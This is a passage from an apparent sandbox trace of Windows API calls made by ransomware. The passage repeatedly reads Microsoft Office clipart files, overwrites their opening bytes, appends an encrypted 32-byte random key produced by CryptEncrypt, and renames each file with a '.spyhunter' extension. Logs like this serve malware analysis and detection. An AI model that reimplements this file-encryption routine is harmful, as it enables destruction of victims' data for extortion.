dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 67 [0098.127] StrStrW (lpFirst="J0099182.WMF", lpSrch=".txt") returned 0x0 [0098.127] GetProcessHeap () returned 0x2c0000 [0098.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c301b0 [0098.127] ReadFile (in: hFile=0x174, lpBuffer=0x2c301b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb54, lpOverlapped=0x0 | out: lpBuffer=0x2c301b0*, lpNumberOfBytesRead=0x57fb54*=0xf00, lpOverlapped=0x0) returned 1 [0098.134] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffff100, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.134] WriteFile (in: hFile=0x174, lpBuffer=0x2c301b0*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x57fb54, lpOverlapped=0x0 | out: lpBuffer=0x2c301b0*, lpNumberOfBytesWritten=0x57fb54*=0xf00, lpOverlapped=0x0) returned 1 [0098.134] GetProcessHeap () returned 0x2c0000 [0098.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c301b0 | out: hHeap=0x2c0000) returned 1 [0098.134] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.134] WriteFile (in: hFile=0x174, lpBuffer=0x57fb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb54, lpOverlapped=0x0 | out: lpBuffer=0x57fb94*, lpNumberOfBytesWritten=0x57fb54*=0x4, lpOverlapped=0x0) returned 1 [0098.135] WriteFile (in: hFile=0x174, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb54*=0x30, lpOverlapped=0x0) returned 1 [0098.135] CloseHandle (hObject=0x174) returned 1 [0098.166] GetProcessHeap () returned 0x2c0000 [0098.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.166] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF.spyhunter") returned 77 [0098.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf.spyhunter")) returned 1 [0098.295] GetProcessHeap () returned 0x2c0000 [0098.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.295] GetProcessHeap () returned 0x2c0000 [0098.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.295] GetProcessHeap () returned 0x2c0000 [0098.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38eff0 | out: hHeap=0x2c0000) returned 1 [0098.295] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb90 | out: pbBuffer=0x57fb90) returned 1 [0098.295] GetProcessHeap () returned 0x2c0000 [0098.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.295] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb88*=0x30) returned 1 [0098.295] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.296] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF") returned 67 [0098.296] StrStrW (lpFirst="J0107488.WMF", lpSrch=".txt") returned 0x0 [0098.296] GetProcessHeap () returned 0x2c0000 [0098.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c229b0 [0098.296] ReadFile (in: hFile=0x174, lpBuffer=0x2c229b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c229b0*, lpNumberOfBytesRead=0x57fb4c*=0x1f40, lpOverlapped=0x0) returned 1 [0098.334] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffe0c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.334] WriteFile (in: hFile=0x174, lpBuffer=0x2c229b0*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x57fb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c229b0*, lpNumberOfBytesWritten=0x57fb4c*=0x1f40, lpOverlapped=0x0) returned 1 [0098.335] GetProcessHeap () returned 0x2c0000 [0098.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c229b0 | out: hHeap=0x2c0000) returned 1 [0098.335] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.335] WriteFile (in: hFile=0x174, lpBuffer=0x57fb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb4c, lpOverlapped=0x0 | out: lpBuffer=0x57fb8c*, lpNumberOfBytesWritten=0x57fb4c*=0x4, lpOverlapped=0x0) returned 1 [0098.335] WriteFile (in: hFile=0x174, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb4c*=0x30, lpOverlapped=0x0) returned 1 [0098.335] CloseHandle (hObject=0x174) returned 1 [0098.335] GetProcessHeap () returned 0x2c0000 [0098.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a1020 [0098.335] wnsprintfW (in: pszDest=0x3a1020, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF.spyhunter") returned 77 [0098.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf.spyhunter")) returned 1 [0098.336] GetProcessHeap () returned 0x2c0000 [0098.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a1020 | out: hHeap=0x2c0000) returned 1 [0098.336] GetProcessHeap () returned 0x2c0000 [0098.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.336] GetProcessHeap () returned 0x2c0000 [0098.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1fab0 | out: hHeap=0x2c0000) returned 1 [0098.336] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb90 | out: pbBuffer=0x57fb90) returned 1 [0098.336] GetProcessHeap () returned 0x2c0000 [0098.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.336] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb88*=0x30) returned 1 [0098.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0098.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 67 [0098.371] StrStrW (lpFirst="J0145272.JPG", lpSrch=".txt") returned 0x0 [0098.371] GetProcessHeap () returned 0x2c0000 [0098.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c20168 [0098.376] ReadFile (in: hFile=0x16c, lpBuffer=0x2c20168, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesRead=0x57fb4c*=0x2800, lpOverlapped=0x0) returned 1 [0098.398] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.398] WriteFile (in: hFile=0x16c, lpBuffer=0x2c20168*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesWritten=0x57fb4c*=0x2800, lpOverlapped=0x0) returned 1 [0098.398] GetProcessHeap () returned 0x2c0000 [0098.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20168 | out: hHeap=0x2c0000) returned 1 [0098.399] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.399] WriteFile (in: hFile=0x16c, lpBuffer=0x57fb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb4c, lpOverlapped=0x0 | out: lpBuffer=0x57fb8c*, lpNumberOfBytesWritten=0x57fb4c*=0x4, lpOverlapped=0x0) returned 1 [0098.424] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb4c*=0x30, lpOverlapped=0x0) returned 1 [0098.424] CloseHandle (hObject=0x16c) returned 1 [0098.424] GetProcessHeap () returned 0x2c0000 [0098.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.424] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG.spyhunter") returned 77 [0098.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg.spyhunter")) returned 1 [0098.427] GetProcessHeap () returned 0x2c0000 [0098.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.427] GetProcessHeap () returned 0x2c0000 [0098.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.427] GetProcessHeap () returned 0x2c0000 [0098.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c289c8 | out: hHeap=0x2c0000) returned 1 [0098.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb88 | out: pbBuffer=0x57fb88) returned 1 [0098.428] GetProcessHeap () returned 0x2c0000 [0098.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.428] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb80*=0x30) returned 1 [0098.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0098.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 67 [0098.429] StrStrW (lpFirst="J0158477.WMF", lpSrch=".txt") returned 0x0 [0098.429] GetProcessHeap () returned 0x2c0000 [0098.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.429] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb44*=0x2800, lpOverlapped=0x0) returned 1 [0098.464] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.464] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb44*=0x2800, lpOverlapped=0x0) returned 1 [0098.464] GetProcessHeap () returned 0x2c0000 [0098.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.464] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.464] WriteFile (in: hFile=0x16c, lpBuffer=0x57fb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb44, lpOverlapped=0x0 | out: lpBuffer=0x57fb84*, lpNumberOfBytesWritten=0x57fb44*=0x4, lpOverlapped=0x0) returned 1 [0098.492] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb44*=0x30, lpOverlapped=0x0) returned 1 [0098.492] CloseHandle (hObject=0x16c) returned 1 [0098.492] GetProcessHeap () returned 0x2c0000 [0098.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.492] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF.spyhunter") returned 77 [0098.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf.spyhunter")) returned 1 [0098.493] GetProcessHeap () returned 0x2c0000 [0098.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.493] GetProcessHeap () returned 0x2c0000 [0098.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.493] GetProcessHeap () returned 0x2c0000 [0098.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c2ac38 | out: hHeap=0x2c0000) returned 1 [0098.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb88 | out: pbBuffer=0x57fb88) returned 1 [0098.493] GetProcessHeap () returned 0x2c0000 [0098.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb80*=0x30) returned 1 [0098.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0098.494] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 67 [0098.494] StrStrW (lpFirst="J0185670.WMF", lpSrch=".txt") returned 0x0 [0098.494] GetProcessHeap () returned 0x2c0000 [0098.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.494] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb44*=0x1c88, lpOverlapped=0x0) returned 1 [0098.520] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffe378, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.520] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1c88, lpNumberOfBytesWritten=0x57fb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb44*=0x1c88, lpOverlapped=0x0) returned 1 [0098.520] GetProcessHeap () returned 0x2c0000 [0098.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.520] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.520] WriteFile (in: hFile=0x16c, lpBuffer=0x57fb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb44, lpOverlapped=0x0 | out: lpBuffer=0x57fb84*, lpNumberOfBytesWritten=0x57fb44*=0x4, lpOverlapped=0x0) returned 1 [0098.520] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb44*=0x30, lpOverlapped=0x0) returned 1 [0098.520] CloseHandle (hObject=0x16c) returned 1 [0098.520] GetProcessHeap () returned 0x2c0000 [0098.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x394fd8 [0098.521] wnsprintfW (in: pszDest=0x394fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF.spyhunter") returned 77 [0098.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf.spyhunter")) returned 1 [0098.521] GetProcessHeap () returned 0x2c0000 [0098.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x394fd8 | out: hHeap=0x2c0000) returned 1 [0098.521] GetProcessHeap () returned 0x2c0000 [0098.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.521] GetProcessHeap () returned 0x2c0000 [0098.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c2c638 | out: hHeap=0x2c0000) returned 1 [0098.522] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb80 | out: pbBuffer=0x57fb80) returned 1 [0098.522] GetProcessHeap () returned 0x2c0000 [0098.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.522] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb78*=0x30) returned 1 [0098.522] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187895.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0098.523] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF") returned 67 [0098.523] StrStrW (lpFirst="J0187895.WMF", lpSrch=".txt") returned 0x0 [0098.523] GetProcessHeap () returned 0x2c0000 [0098.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.523] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb3c*=0xd90, lpOverlapped=0x0) returned 1 [0098.531] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff270, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.532] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x57fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb3c*=0xd90, lpOverlapped=0x0) returned 1 [0098.532] GetProcessHeap () returned 0x2c0000 [0098.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.532] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.532] WriteFile (in: hFile=0x16c, lpBuffer=0x57fb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb3c, lpOverlapped=0x0 | out: lpBuffer=0x57fb7c*, lpNumberOfBytesWritten=0x57fb3c*=0x4, lpOverlapped=0x0) returned 1 [0098.532] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb3c*=0x30, lpOverlapped=0x0) returned 1 [0098.532] CloseHandle (hObject=0x16c) returned 1 [0098.532] GetProcessHeap () returned 0x2c0000 [0098.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x394fd8 [0098.532] wnsprintfW (in: pszDest=0x394fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF.spyhunter") returned 77 [0098.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187895.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187895.wmf.spyhunter")) returned 1 [0098.533] GetProcessHeap () returned 0x2c0000 [0098.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x394fd8 | out: hHeap=0x2c0000) returned 1 [0098.533] GetProcessHeap () returned 0x2c0000 [0098.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0098.533] GetProcessHeap () returned 0x2c0000 [0098.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x391810 | out: hHeap=0x2c0000) returned 1 [0098.534] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb80 | out: pbBuffer=0x57fb80) returned 1 [0098.534] GetProcessHeap () returned 0x2c0000 [0098.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0098.534] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb78*=0x30) returned 1 [0098.534] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187883.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0098.534] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF") returned 67 [0098.534] StrStrW (lpFirst="J0187883.WMF", lpSrch=".txt") returned 0x0 [0098.534] GetProcessHeap () returned 0x2c0000 [0098.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.534] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fb3c*=0x834, lpOverlapped=0x0) returned 1 [0098.595] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff7cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.596] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x834, lpNumberOfBytesWritten=0x57fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fb3c*=0x834, lpOverlapped=0x0) returned 1 [0098.596] GetProcessHeap () returned 0x2c0000 [0098.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.596] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.596] WriteFile (in: hFile=0x16c, lpBuffer=0x57fb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb3c, lpOverlapped=0x0 | out: lpBuffer=0x57fb7c*, lpNumberOfBytesWritten=0x57fb3c*=0x4, lpOverlapped=0x0) returned 1 [0098.596] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb3c, lpOverlapped=0x0 | out: 